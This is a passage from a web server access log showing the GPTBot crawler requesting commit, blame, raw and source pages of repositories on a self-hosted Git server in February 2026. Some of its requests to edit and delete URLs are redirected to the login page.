74.7.227.38] [Length 55878] [Gzip 8.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets" +[17/Feb/2026:15:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" +[17/Feb/2026:15:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" +[17/Feb/2026:15:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" [Client 74.7.227.38] [Length 23743] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" +[17/Feb/2026:15:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" +[17/Feb/2026:15:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" +[17/Feb/2026:15:05:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 204145] [Gzip 13.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" +[17/Feb/2026:15:05:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.gitignore" +[17/Feb/2026:15:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.gitignore" +[17/Feb/2026:15:05:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/nginx.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx.conf" +[17/Feb/2026:15:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/nginx.conf" +[17/Feb/2026:15:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/nginx.conf" [Client 74.7.227.38] [Length 10048] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx.conf" +[17/Feb/2026:15:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" +[17/Feb/2026:15:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.gitignore" [Client 74.7.227.38] [Length 9811] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.gitignore" +[17/Feb/2026:15:05:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/nginx.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx.conf" +[17/Feb/2026:15:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/nginx.conf" +[17/Feb/2026:15:05:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.gitignore" +[17/Feb/2026:15:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.gitignore" +[17/Feb/2026:15:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.gitignore" [Client 74.7.227.38] [Length 10239] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.gitignore" +[17/Feb/2026:15:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.gitignore" [Client 74.7.227.38] [Length 898] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.gitignore" +[17/Feb/2026:15:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.gitignore" [Client 74.7.227.38] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.gitignore" +[17/Feb/2026:15:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/nginx.conf" [Client 74.7.227.38] [Length 796] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx.conf" +[17/Feb/2026:15:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/nginx.conf" [Client 74.7.227.38] [Length 1476] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx.conf" +[17/Feb/2026:15:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" +[17/Feb/2026:15:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 15187] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:15:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md?display=source" [Client 74.7.227.38] [Length 15368] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" +[17/Feb/2026:15:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md?display=rendered" [Client 74.7.227.38] [Length 13439] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" +[17/Feb/2026:15:05:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18918] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build" +[17/Feb/2026:15:05:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18883] [Gzip 6.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" +[17/Feb/2026:15:06:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.gitignore" +[17/Feb/2026:15:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.gitignore" +[17/Feb/2026:15:06:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.gitignore" +[17/Feb/2026:15:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.gitignore" +[17/Feb/2026:15:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18916] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build" +[17/Feb/2026:15:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10675] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10167] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18878] [Gzip 6.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build" +[17/Feb/2026:15:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10707] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:06:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10705] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:06:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10707] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25008] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 20647] [Gzip 14.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:06:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10203] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:06:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9911] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25006] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10201] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10384] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:06:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 24978] [Gzip 12.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:06:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10407] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10404] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10407] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10178] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18916] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 